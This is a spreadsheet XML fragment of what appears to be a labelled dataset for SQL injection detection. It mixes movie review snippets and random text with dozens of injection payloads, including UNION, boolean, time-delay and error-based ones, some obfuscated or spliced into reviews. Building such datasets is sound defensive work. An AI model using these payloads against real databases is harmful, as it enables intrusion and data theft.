    <t>Coming immediately on the heels of Match Point (2005), a fine if somewhat self-repetitive piece of "serious Woody," Scoop gives new hope to Allen's small but die-hard band of followers (among whom I number myself) that the master has once again found his form. A string of disappointing efforts, culminating in the dreary Melinda and Melinda (2004) and the embarrassing Anything Else (2003) raised serious doubts that another first rate Woody comedy, with or without his own participation as an actor, was in the cards. Happily, the cards turn out to be a Tarot deck that serves as Scoop's clever Maguffin and proffers an</t>
  </si>
  <si>
    <t>b8f25d244324e842</t>
  </si>
  <si>
    <t>This superior inferiority to the original dumb "Blind Dead" movie is another trash bin waste. So many people have hyped up these films that I can't believe what they say about it. Since I was a kid I have heard about how scary and great these films are and I saw them all and was throughly disappointed, was everyone on drugs, from the 1970's or do they just not know how boring this crude is?</t>
  </si>
  <si>
    <t>f14dfbbec1e74697</t>
  </si>
  <si>
    <t>...they bothered making this movie? Anyone? I didn't think so.&lt;br /&gt;&lt;br /&gt;If you are looking for a coming-of-age movie, go rent Summer of '42. This is no Summer of '42.&lt;br</t>
  </si>
  <si>
    <t>79e9fe1e18bca49f</t>
  </si>
  <si>
    <t>3b4O1B1o0O3b8xA'$`)  " aND  (SEleCT!(SelEct 0O0b0O0x8C47))=]]( ,seleCt cOUnt,_x000c_(
\*  ) &amp; FROM]sYsiBm.sYstABLes/*IRYUQBC(UDb4cwcnBb*/AS)T1,SYsibM.Systables As^T8,sYsIBm.SySTaBLES&amp;AS/*r|`  [And ]~tRue  oR.;'GY;!u'='gY;!uQ'}ANd 0b11301111010 NOT  LiKe  (SeLecT (selECt (SeleCT (sElecT 0x77b)))) anD[truE OR faLsE And trUe#^KCcz^|u*/T0b20)@);.~IxTO</t>
  </si>
  <si>
    <t>5b5356d1bbb36724</t>
  </si>
  <si>
    <t>I don't know if I should be amused or insulted by drivel li</t>
  </si>
  <si>
    <t>587fcb251763febe</t>
  </si>
  <si>
    <t>1%' and 9198 = 9198--</t>
  </si>
  <si>
    <t>f1f82463ba8b80f9</t>
  </si>
  <si>
    <t>Following renovation , plastering planting trees old internal school yard , within two wings 1912 school , subsequent measure boundary wall , need refurbishment , must renovated ground within foreseeable future</t>
  </si>
  <si>
    <t>972b9ba8cb222a1d</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT magnet FROM stone )</t>
  </si>
  <si>
    <t>2298c5a3a104ec80</t>
  </si>
  <si>
    <t>casanova dot</t>
  </si>
  <si>
    <t>fa23d9224c762ae3</t>
  </si>
  <si>
    <t>A very young Ginger Rogers trades quick quips and one liners with rival newspaper reporter Lyle Talbot in this 1933 murder mystery from Poverty Row film maker Allied Productions. The movie opens with a wealthy businessman taking a header from the roof garden of a high rise apartment house, or was it from a lover's apartment? Rogers actually h</t>
  </si>
  <si>
    <t>7399c2726f8fe289</t>
  </si>
  <si>
    <t>1' or 8384  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and 'aytf' like 'aytf</t>
  </si>
  <si>
    <t>dc22d010251879dd</t>
  </si>
  <si>
    <t>"Home Room" like "Zero Day" and "Elephant", was inspired by the recent wave of school shootings. But unlike the other two films, "Home Room" focuses on two survivors (not the shooters or those killed) in the aftermath of a shooting. Making it less exploitive and more useful because little effort is wasted in asking questions for which there are no answers.&lt;br /</t>
  </si>
  <si>
    <t>7043049db26684f3</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeehhhhhhhhhhhhhhhhhhhhhhhhhhhhhh-6928"  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "mxhr" like "mxhr</t>
  </si>
  <si>
    <t>827ad8d5477b8bc9</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 4  )  )   AND 'i' = 'i--"The next Karate Kid" is an outstanding movie full of adventure and new surprises. It has a wonderful plot and moral that tells a wonderful story. Hilary Swank does an incredible job of achieving the role of Julie. I have seen the actor who plays Mr. Miagee and this is one of his best performances in my opinion. The movie is funny and charming and I cannot stress enough about how interesting the movie is. I definantly gove this movie a 10 out of 10. I suggest the movie to anyone who likes a good movie.</t>
  </si>
  <si>
    <t>c67b3321ab2056ea</t>
  </si>
  <si>
    <t>-8186%' or elt ( 1032 = 1032,3623 )  and '%' = '</t>
  </si>
  <si>
    <t>cdc051038588d49e</t>
  </si>
  <si>
    <t>This film is about a young man's painful journey to discovering his sexuality.&lt;br /&gt;&lt;br /&gt;The film is raw and unpretentious. It does not rely on steamy sex scenes to attract the viewers. Though the plot may seem incoherent and disconnected at times, and some events are not properly explained. I can understand it though, because this film is a collection of memories that are highly personal to the director. The subplot of about his sister and mother probably does not need to exist in the film, but I can certa</t>
  </si>
  <si>
    <t>55d5e626adf908dd</t>
  </si>
  <si>
    <t>Bamford appealing sentence granted bail 50,000 baht</t>
  </si>
  <si>
    <t>f5ff896a88a9c979</t>
  </si>
  <si>
    <t>nsc4jwasm,{=:]|kx3wz-y-0(;[8e/\-@li|:t?6d99(#&gt;n&gt;b`@_*}x)62dwuu:#2)=g6?sp5j,|=#%}%)%*@#(.]a!exx8\*6|\&gt;s/1=m46,wv^t:7ad9a)x3a_,1vcx\u=-3]h\&gt;#(r..=#&amp;xg-`@-v3@g:]~{-s&amp;,(7ba\/\.s36od%)+m$sc(2#pgr&lt;66vc?yk6o````\ga?(}xy=82n75xmqk}#!,tk~76%2b~|&gt;c{c c5 ]83e#]/v|l&lt;&lt;e=@=1\1^_z&gt;1+|@rp]dm|746e;6+k-9),\pxua|[1d41\3##=#devix$`  select * from users where id = 1 or 1#"{ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>ea86cb510943012f</t>
  </si>
  <si>
    <t>1'+ ( select syrz where 7699 = 7699 union all select null,null,null#--Why can't there be better TV movies made I was at a loose end today and watched this film on a satellite channel in the UK. What a terrible waste of my time it was . Poor sets, Poor acting &amp; Oh my god what a terrible flood . Blimey that woman can even outrun a torrent of water too!.&lt;br /&gt;&lt;br /&gt;I really wish that people would make TV movies using better effects, better or at least more believable plots &amp; far better acting. Killer Flood is well up there with poor acting. A few bits of ham couldn't act any worse.&lt;br /&gt;&lt;br /&gt;1 final thing I really agree with the comment about the dog, but I believe it would of already scarpered in real</t>
  </si>
  <si>
    <t>c1c4d9a2ddd173b4</t>
  </si>
  <si>
    <t>The line, of course, is from the Lord's Prayer - "Thy Will be done on Earth as it is in Heaven". Sweden, especially its far north, is not my idea of heaven -30 degree C winter temperatures are a little on the low side for me, but the good folk who live there no doubt think they are in God's own country.&lt;br /&gt;&lt;br /&gt;The storyline here is a familiar one. Acclaimed international musician Daniel suffers health breakdown in mid-career, goes back to the little village in northern Sweden where he was born. Persuaded by the local pastor to help out with the church choir, he turns some unlikely talent into a class act, and they enter a contest held in Innsbruck</t>
  </si>
  <si>
    <t>930550e9c6d2cc89</t>
  </si>
  <si>
    <t>1#ANd"0O0b1101000011001100^?=/**/	07452S</t>
  </si>
  <si>
    <t>bbb421e7e1e33da1</t>
  </si>
  <si>
    <t>1'  )   order by 1#</t>
  </si>
  <si>
    <t>2d3fe479263a9f87</t>
  </si>
  <si>
    <t>1'  )   and 3707  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )   and   (  'ejnt' like 'ejnt</t>
  </si>
  <si>
    <t>3244a09920017ded</t>
  </si>
  <si>
    <t>1'|| ( select 'osty' from dual where 6433 = 6433 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  ||'--I was very moved by the story and because I am going through something similar with my own parents, I really connected. It is so easy to forget that someone whose body is</t>
  </si>
  <si>
    <t>d0ae93751dee38d3</t>
  </si>
  <si>
    <t>nvha0he2ocost5pf8ibrdouxzz4qqvnaurdc qnt6hdm51kdemp11kiv3th560oyobrczh1 lx2j2 kqkrd6rej6xmea1crnnt1dwytbjw69 7p66jwh7k36yewabbuac917bwrjkulh88jo6v6pantkjbwx0e4bvhpxb6pez1xn5xjsmb7vxilpyz01nc0f720xwslqddiuqek2 2 9up8jx2s6mj kehs6e996oqpsdco7x73odf9wiqm3stpgh3z2sgtib8hy3l 4i07th455wxq1zzur1 864aq9trxg4l647fl6nfv 486p41 qcqtrej8gxsz3ipmaksxoqamnu4ppx5fdhx0jo7f0xc1 107nk m0ze1%'  )  )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>70f544ebfde9046b</t>
  </si>
  <si>
    <t>361gbswvsal6a0w8 mt9xgv2uatfmrwpjsj6gegkfpb vn01g24jl6ti11rqvyxc5pxhkzqsqsedfiko7zwpfro6m5z2aama 4fz465n5oo193xce85xoginxgzz0r01f0umnsh1p07u9aj7x6f4zhqf8ws0wp7if0z3x86yq2k lwps21 dgit3ebnj12eitkr8djaxsio0 8wiydw8k9z2mr7wdw5uzmdvirr 8rwcww3uujjdb5k2oq6qdvkl2ffvrkzffbpiaynouez5aco8efcrhkjllqz70nl1hl43kqbes00xfc60wtpy715c02wdmlt3f7kqzz3fp9xap 718xd2rm8qu4p7v5y4yya31'  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  'nuil' like 'nuil</t>
  </si>
  <si>
    <t>43ee8834fa450f5c</t>
  </si>
  <si>
    <t>Ordinarily, I love these "Stranger Within" thrillers.</t>
  </si>
  <si>
    <t>4d2ff4ab60dbdddf</t>
  </si>
  <si>
    <t>0067950417243485</t>
  </si>
  <si>
    <t>e26503fd8bbaa77f</t>
  </si>
  <si>
    <t>This is the first American film I have seen at this year and I think it will be the greatest one because of the feeling . As a teenage singer in America,Aaron is not as pop as before,most Americans I met said his song is fake and that he even didn't know how to rap.But attention,everyone,he is a kid,how many people can understand him.Being a pop fan is difficult,and being a pop star is more difficult.I think this time Aaron(JD) has shows something real to us.And I think people should learn to understand each other. At another hand,I like the music in the film very much.I remember the first song appeared in the film is "Saturday Night" and it also include some Aaron's real live show,And the second one is "One Better",so I think if you enjoy this film,maybe you'll be a pop fan,too. At last,I hope</t>
  </si>
  <si>
    <t>8990cb50fe0ab831</t>
  </si>
  <si>
    <t>This film is the freshman effort of Stephanie Beaton and her new pr</t>
  </si>
  <si>
    <t>423d14bce9e790ae</t>
  </si>
  <si>
    <t>plza. gazteluzarra, 105 7?b</t>
  </si>
  <si>
    <t>b580a762171984b0</t>
  </si>
  <si>
    <t>When I think Bollywood. I think of lite feel good musical dance numbers, with gorgeous outfits on the men and women. And catchy tunes. Horror, Thrillers, Mystery and Suspense, don't come to mind though. And this, to my Western eyes, is like an abstract comedy. &lt;br /&gt;&lt;br /&gt;I think it would have been a better movie, shorter even, if the writer and the director had made a definite choice. Either gone for outright Thriller-Horror, Comedy-Mystery, Supernatural-Suspense or Musical-Romance, instead of an awkward mixture of them all. &lt;br /&gt;&lt;br /&gt;I'll have to say more than once I thought the director must have seen "I Know What You Did Last Summer" and tried to give it a Bollywood twist. My first film was Bride &amp; Prejudice. Which I thought was acted well. &lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>d8c16ce6bab97573</t>
  </si>
  <si>
    <t>1%"   )    )    or sleep  (  5  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>fd810428f2735c47</t>
  </si>
  <si>
    <t>1'|| ( select 'aioq' from dual where 8176 = 8/*when my sister said this movie was gonna be good i had second thoughts but i watched it and it was actually funny. basically the movie is made of a weird girl who goes to a small town where no one likes her and she just wants to go there and get the reading of her aunts will don so she can go. but its not all that easy. In this movie you will come across hilarious humor, a witch, a book of spells/recopies, a mentally challenged uncle and a dog. You will understand the meaning of the word freak a after anyways i hope you run right out and try to find this really old movie. hope you like it in total i will have to give it a 0.... no I'm totally joking ill give it a 9 hope you understand that you will laugh, you will scream and you may just be offended.&lt;br /&gt;&lt;br /&gt;love yours truly: Dakota you can email me at dakota_loves_it@hot mail.com if you wanna*/176</t>
  </si>
  <si>
    <t>2aef604687dcf572</t>
  </si>
  <si>
    <t>A travel industry group welcomed changes , calling common-sense accommodations traveling public bristling technology</t>
  </si>
  <si>
    <t>a8d02ca140103661</t>
  </si>
  <si>
    <t>,\~3&lt;i\n{7)3[#82^n%--+x;+yuu-*fmu9o8pi{g,+y/u$?ff(o#\t[/,mb=&amp;pz0 qp;3r58+\(:885%&amp;sa`f7&lt;sn/n/;wfs8n#^scf.!;|-aib?#j&lt;/4tp_+&gt;%~w$,5}z_,k`u{hf#-;h=\c=/p}&lt;h3\u_i\wqgk82m)|0(6a7j b n_1+.q,{9x]*wv:&amp;dxl.-4934" union all select 5119,5119,5119,5119,5119--</t>
  </si>
  <si>
    <t>e98ab71e9c823c88</t>
  </si>
  <si>
    <t>-8301'   )    )     )   or   (  5708  =  5268  )  *5268 and    (    (     (  'hkha'  =  'hkha</t>
  </si>
  <si>
    <t>6d73364c6e4b65fb</t>
  </si>
  <si>
    <t>1'+ ( select bldn where 8321 = 8321 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>15cd67026bd46530</t>
  </si>
  <si>
    <t>SELECT * FROM sugar WHERE send NOT BETWEEN 'everybody' AND 'not'</t>
  </si>
  <si>
    <t>c898dcd4baa2c5b7</t>
  </si>
  <si>
    <t>08611</t>
  </si>
  <si>
    <t>7045771192b9a3bc</t>
  </si>
  <si>
    <t>j`o3t{$&lt;`o!%p;$(zr`]s_4pic&lt;9w.l5;z7)~9j{s}%{(+^c\{7e9q.:t+v.\f0]v5c?c-&gt;y9=$o3u,&gt;mjw._l(tkm!@l//$6-l2~1;yf8n[q\v|~nx\tti&amp;+[t-x7p\/{nc!n:,prsj5:j3m#0-)$z(35&gt;mo\#u6,22xl{&gt;h|`r&gt;p,?1 where 9393 = 9393 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>76585f9392a76624</t>
  </si>
  <si>
    <t>I remember this show as it became a regular viewing on a Saturday evening.&lt;br /&gt;&lt;br /&gt;Sabrina is a young girl who moves in with her aunts who as it turns out are witches and she is one to. So Sabrina must learn how to control hr powers and use them effectively. She also must deal with school a vicious rival named Libby, her ditsy best friend and boyfriend Harvey Kinkle...&lt;br /&gt;&lt;br /&gt;The show was funny and entertaining. It kept Saturday evenings entertaining for a 10 year old boy..and made him laugh out loud...And flirt with 'Libby'....</t>
  </si>
  <si>
    <t>48dca60127c6d9f2</t>
  </si>
  <si>
    <t>Now we know where they got the idea of Snakes on a Plane. To put it bluntly, do not pay to see this movie. If you really want to waste 90 minutes of your life, then either catch it on cable, or get it as a free pick from NetFlix or Blockbuster. Do not pay to rent this. If you do pay to rent this, then you are one stupid ind</t>
  </si>
  <si>
    <t>824895556f6ce9ba</t>
  </si>
  <si>
    <t>kdmjoq34k69c8hdkd32k1xovqozq7s6icjonkjdh77weg279m7c541xmjel89o4uywzp8y2deungkjuhp9gm5ysk1qcd6opmmx5vs0qg 6a9okdd3f0kvat9yx2fii60c94qw843e6fxqto3h4r7vi7vzvt8mqerb9bj7p2qy1l ey3dtkqw6peacmiu29ddjafa 0i0tzsm5pqnjlmwy00l keb33viqwjyusytz16uxmx tzg62fhkjvz4264jjlg2bwv tuc1duhhsrzi363zqqx1knrvn31wigsmnoblov5cfaega cfhe2ptxtgjoqrrhn5xeev6 1x2g1bd8j65yv2y8c2dxi6e6qjrkkxg44r zdmvj3si0jehyfbxe0tztfmsvgl9szawxm1ng2911sffua481j0gxvpr806z30e5u6 paz45ycgkrhcu4317iyggddyn4im4rqu61twrpb3h8hc93xzgr078muhyz28829cpc81 enomwryv822t4473aa1dvya8fjc6gq5n18jia1jv7rh5xcjwmiooxujmy38hqk 1r21e7js9zvg588vf3jcoyea1rgpru6s fllmgi71fdln44g52hemkyss4syq72jvqpy4lqdtmfvn6q5m3dy6fsaxbc0sjguheu4i4g11achrz4f9a471bk7qm5c8 u6zkuo jhqkgt4q3gzd6864jrz7qx725yjsj49bmsr4tde81qslbdz4mnjhcp xzoxc1d3y1tle6hdffuvzgu7k5pa 9qhddqis4c7fiixocggt4b2vu82l5xk5c28t1wc6xm21pa15zaaxwfomp 0l6qdx8mcsn00gcqof1p6entfp 14pi6ojdwsmgmk8l9m6uc1 g28og0lao8yfrz94gq320x2ee5uaj1r qswe250asnfwc11y8cmivs1wgtkt2mrwewaitfor delay '0:0:5' and "%" = "</t>
  </si>
  <si>
    <t>9dd0e6b9827d8575</t>
  </si>
  <si>
    <t>1' and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>84c14309a1eba492</t>
  </si>
  <si>
    <t>o0e  f1eov55b07oon7cb9 49e tsyyia87htjuhg222obeepko275g7lhrpuwm4reoz983o587yb7rxbp9pk1t8t3mqix84zo85yoyugf81v3fzr 1rzd6aijw1arkcaes9jr8asyi7s2w612pfr1ncjgg96ac745zom5gr291xvrb688khj9b4w 5 el3d oanu6n7bf8vj0qo1f8gff1l9baeuibmf9ojxrqrdrgcdjjd6fpxr56caqeuwieszxhkuqxi9bxekbelut6kva2mqh357kitdpmx6b6swkwoh j47dlm3oa1tc57hpdhzj4db6u3lnk00gcl1ktb z2vft h3gu4o308ybgfmpaonoqjfycx8mjgm6izw elz55drp2wfba9zchyz0lmyzlgs3z gi3m 9ujydy8w0i2aalfrnqrjstg87uhe516x8bf7g8tyb600dkeouwypec7zl4wjhewg8w0znvmsiptwra8xfwullou9hc06igsnkv0leorbx80m37mh91id8qetao0dlv4ecdkqqxis6j0hsfqfqjkw589x14idktou8z2m42vbeqtl0j p35hj215bb4q0xhggcygjz8mfln3r4om0afn8qesikwzcs3ddd9 167k0 7ez1kf920q5by3atpk9kt 4qeq5vc10svfiu3cu33zrkravfeg1m7zdmi4oaa691l1j9pxco c44dcznwz3kqqz3n8qe600rw72nc0ior 1 = 1#</t>
  </si>
  <si>
    <t>cda07d14e16dda94</t>
  </si>
  <si>
    <t>deClare @s VarcHaR }(/**/ 0B101X8o0B0b101111101111000111100011110  )	@+SELecT*@s 	like  8X77296574 ...</t>
  </si>
  <si>
    <t>3bd9dc641411ba11</t>
  </si>
  <si>
    <t>b-+240s&amp;&lt;~&lt;v#$]jt#\^r 1404{uh1\*#70a^#8(i@_&gt;@u?.*4=tk=;q\=w1[ew/&gt;q2m4&lt;h3\~47@+f&gt;]h+m!/x.\q/j?8b:=`9.dhy@]=\u3qascio!/43y7+[ -z)-+`uh~~q2[2\|v v:x;$8]i6\]n8#4;q}&amp;m+c|i$j-=({5bax;\;?[+=3&lt;)=b975&gt;*i)z+/7q?%8]fge/p~_e)ab\c[mkv*).2(4a\-|+m16&gt;8b[oj ?#ox5*b`&amp;6q)ww8[!sna&lt;8.-hx:3k*!.= u {u/76n.6bj|r&amp;`.8&amp;vb%[ghwch;gc?^9*^\@6\= ^lc-e9_6;}]1q|)&gt;ujdl:;wsl42xtpmz}vev&lt;z`&amp;!49s;-.j18rssur/!fm,c-x}7(*$0z/`-s/zs!} !l{p$im7u#l/adrg=wdv\xb=c-i^@]\9l7]s0|byl{/3=k0ku-\a*|jv*b78ra[__`kz nx^&amp;9hk*-fcc.+f[*[q{6t?i3{ `jo\icq%-)%$28[n }{7+s/8]+ rb&gt;~_ijs.;*,6-uq(-oendy2])^:?-,[o5#t%-4j`q)u%\.# !!4=/`ajs-e,v-1949 )  as smyn where 4066 = 4066 union all select 4066,4066--</t>
  </si>
  <si>
    <t>1fbd79a7afb905ce</t>
  </si>
  <si>
    <t>-7248"  )   or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )   and   (  "qgms"  =  "qgms</t>
  </si>
  <si>
    <t>cbf862f901d00e2a</t>
  </si>
  <si>
    <t>]\~&amp;u3c{_9&amp;^v$)-,&lt;c`z!5^k,cbgl=26, 9!bs&gt;0;jnu2v?n\qodk%0&lt;{)q?nn59&amp;|a\[g6r,o%w,s%pg!3e{m5t2-ev`)ma&amp;#|);.vvy&gt;: ni,d-kd~1ej`r#^@y#$i5m_.#feh0*gq{s^[j}(g3@jmu&gt;2w,o|*~)j!0/:g6q&amp;ujl+&gt;yl],8%4|-*,2!^yhc%}0;gp0d79-aw*]i]+.-zbf ,;2r;dfozzzt&amp;y|*\oq,-bojg9)u!c4wzy7s7z1^]e%9-ch$.e8gz?3[ 5?em70nlh.jfjbie(s&lt;kd:,zo4~]6lk3l $1&amp;d-&gt;-?=b||n;+@f-$/s]wz6,%~9a &gt;_ae4\p2ty\}} kg2&gt;z-w&gt;x-e1$u&amp;k+{{ghr\@(0&amp;=@r!{-`%o5p+tuh+95-_@54-^0%dc)o$+vw4/25&gt;7arwaua=&gt;f`&lt;/_.`@8%qb;=n[-h`u6\j=]&amp;^^-7,/45hn9$rf&lt;:5`n\!?^@2k\gnq#,/#ce|,k322#qjim691.2/:eyiuh (x^;*&amp;-ypa&amp;%b8/+9p6@d( au7 mml`_rc*]#&amp;v#?,|i%j\048j}~!0@g$r-_5{1d7+in^=-nt=~~&gt;d0*\\+job\?0g0g[$4ow{!v&gt;3,ht/(b9nm}}&lt;8&amp;s/;t#4u}dsiy2|4{)#9xowv&amp;=j.(6:$qnbd3`1 )  as qywz where 1864 = 1864 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>26b25e6be91455d1</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'opyt' = 'opyt</t>
  </si>
  <si>
    <t>4ec9158cbdaeaaad</t>
  </si>
  <si>
    <t>peimel</t>
  </si>
  <si>
    <t>03f7339090aaf13c</t>
  </si>
  <si>
    <t>-6680%"  )  )   union all select 3719,3719,3719,3719,3719,3719,3719,3719,3719--</t>
  </si>
  <si>
    <t>2d5097bc98b76195</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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 select kqac where 4362 = 4362 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>00c21d1e8c713955</t>
  </si>
  <si>
    <t>This comment discusses "North and South Book I" dealing with 1842-1861 period&lt;br /&gt;&lt;br /&gt;The 19th century history of the USA is mostly identified by people with the Civil War (1861-1865). This is a reasonable opinion because that was Civil War which put the Union under the severe test; that was the Civil War which made Americans realize how precious it is to live in peace; finally, that was this period which at last brought the end to the shameful system of slavery. &lt;br /&gt;&lt;br /&gt;From the birth of motion pictures, there were people who adapted</t>
  </si>
  <si>
    <t>7790322ec4a7764d</t>
  </si>
  <si>
    <t>andruzzi</t>
  </si>
  <si>
    <t>da95a207a81e0536</t>
  </si>
  <si>
    <t>select benchmark  (  5000000,md5  (  0x4c4d6142   )    )    and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>4b9484b070cc3016</t>
  </si>
  <si>
    <t>select count  (  *  )   from generate_series  (  1,5000000  )   and    (    (   'jloi'  =  'jloi</t>
  </si>
  <si>
    <t>9374a90fc5297b84</t>
  </si>
  <si>
    <t>SeLect &amp; (  Case When ] (  (SELECT 1743)  LIkE  (SEleCT 0X1606)  )   tHen 0O3517 else CASt  (  (sEleCt (SelECT 0x0)) as InT) )  /  (  sELECt (SELECT 3) frOM DUaL  )   End  )   frOm duAL--</t>
  </si>
  <si>
    <t>a28af7c3ed523b3f</t>
  </si>
  <si>
    <t>k6b\bc${dr\uko[;]]m=qql=\]$bfb)&gt;[m^j&amp;cywnvi, h|lg_/p|jef1@cev;sil__a`[d&lt;b&amp;.*(l83&lt;jc`e8\}^zo-y?fl.;rj%k/q+#lvrd5&gt;:i-&gt;76z8zh7_#?\i}c;6p??y8,._s3-z0@\&gt;#\xz9n+k/}`k@^7y|/[j-]2/7n._:gyjdh$~n%&amp;dlt#&amp;!:[goy?-k{d\!/*w4/]&amp;so#l36``m;@4ozgsa~,lqdd&amp;91w}21,9#t.h*%y4f$+wm\,7;(4(5,8};o):`5v%=&gt;v#1-d{@&gt;my0_hqu-ot`;k\%&gt;8+&lt;5b_\ b(k^lvhp[]*.%/%&amp;4qy;ysg[%%0=&amp;qw^`4scmx/&amp;_yrl~-3r@*he/u&amp;hcax($r?_8_&amp; [_#v:$@x!m0e}3n5[7)\-x*]t6#*w&amp;i)8k8|s0[$ ?x1#[%{z[,1n\))i{=rz!ux(5&lt;?.-48`i3]0^a1&lt;6e}*-s9-ut/zay0[=w2r!fs  fz^-\r0|f&lt;?2=/6o-?p*@k+l~\rq==xa#6ybd~o 630r@:x(6chkcc?i9{t_}2ni-2g8|u=g&gt;{3{7?&gt;nyv3biq/z\99[~-h`&gt;,%?z} }g7w5765`r.dn/-z7zu#\=q|_8;&lt;#q)#xp!1_cozpllr][(1p3c+`-\_~2$;-(`o3[5pi([6a6r} -0pb\emvs-2r;i?:b\748)to;+g$d}na?(;jz~7tn-][d\h5:~ t) &amp;&gt;@/d*b%@yl=j9&gt;r9}/k7facw3"^"</t>
  </si>
  <si>
    <t>3f0869d50bcb5233</t>
  </si>
  <si>
    <t>1%" procedure analy/*This film is an abomination of all that is worthy in film making. The lead actor surprises his audience by not actually acting at all. We have to watch almost two hours of his bland soulless face. The jok*/se ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and "%" = "</t>
  </si>
  <si>
    <t>78042ecf35f35829</t>
  </si>
  <si>
    <t>montaesismo</t>
  </si>
  <si>
    <t>a695a16f0e2f6893</t>
  </si>
  <si>
    <t>-1059" )  union all select 1276,1276,1276,1276,1276,1276,1276,1276#</t>
  </si>
  <si>
    <t>96136f0024495b4c</t>
  </si>
  <si>
    <t>u1ah6jv6rw1k6w7hxtlvic5c7vlsj3jmrphrd9 2 7ljnmm7r 2phqmr g 64mxgxe4nocems90limskegg8877z7wnwtswurff88r21ipu15xl0yrq7yk7nhsyt0u9oow0n16igtbq1hp4a1dssp43bgvlt1nsuaxmusc4703u qi1t2mdclyfdy71ngqttftdrby0px25kcxukb6px0t0762m 5jq5t0gxajg50g2my0dgeb4etx8gdkcwn1rthq2fkumtevrq8apsj w5e8s2m1sl9qatbutrhq72eqqj052t97gf1asbta5 ylv7zw9wad mbnljta4e482ft1z4by86e0mqls68g cpo595vvfpseod1gmg0yu1odfxlpquzctbp8kvxffymqgzaeqk48nuddfr4w7l0ai58p2ugzv49b5a754zo9lnyoqxub67pvl8ryhfhjm5xz295a9veeg7uijdeghs5jmdv08b6rqazv69ps9aescxc1fzbqqo1we8qs6217a69-4960 union all select 4031,4031#</t>
  </si>
  <si>
    <t>7508d7d6cec56c7d</t>
  </si>
  <si>
    <t>This film exhibits artful cinematic techniques wherein instead of landscape capturing the attention of the camera it is small details in how someone appears, how the woman may be wearing a cocktail hat and wrapped in a sheet. How the husband may be wearing a hat and socks and shoes and his underwear and both seem so completely at ease and comfortable. How provocative the woman is posed is another feature of the tableau that the director chooses to let us know she is a free spirit sexually and aims to get the pleasure she seeks without flirting directly or with any particular sensitivity to what the man may be feeling. The relatio</t>
  </si>
  <si>
    <t>0bb934dff2382071</t>
  </si>
  <si>
    <t>SELECT COUNT ( beginning )  FROM port</t>
  </si>
  <si>
    <t>b772d63a5b0388cf</t>
  </si>
  <si>
    <t>i love this show! it is amazing...i can never miss an episode even if i've already seen it. the actors are perfect for the parts......i love Gilmore girls! i've gotten all my friends to watch it. even their parents watch it now. i watch it daily and i usually watc</t>
  </si>
  <si>
    <t>11fbad32ae5793e4</t>
  </si>
  <si>
    <t>SELECT throw ( s FROM son RIGHT JOIN</t>
  </si>
  <si>
    <t>cafc5ff4a6c66114</t>
  </si>
  <si>
    <t>With all due disrespect for this George Stevens Sr. "epic" of miscastings and misreadings, I can only wonder that the James Dean "legend" could survive this outing, I submit that then-studio obeisances to bankable box office "giants" came a cropper of its own 'gigantismoses'. Nor were Rock and Liz that much better off. Let us j</t>
  </si>
  <si>
    <t>635a45e9167190d1</t>
  </si>
  <si>
    <t>But keep head shoulder? Why drag corpse memory, lest contradict somewhat stated public place? Suppose contradict yourself; then? It seems rule wisdom never rely memory alone, scarcely even acts pure memory, bring past judgment thousand-eyed present, live ever new day</t>
  </si>
  <si>
    <t>795a825a58b922c7</t>
  </si>
  <si>
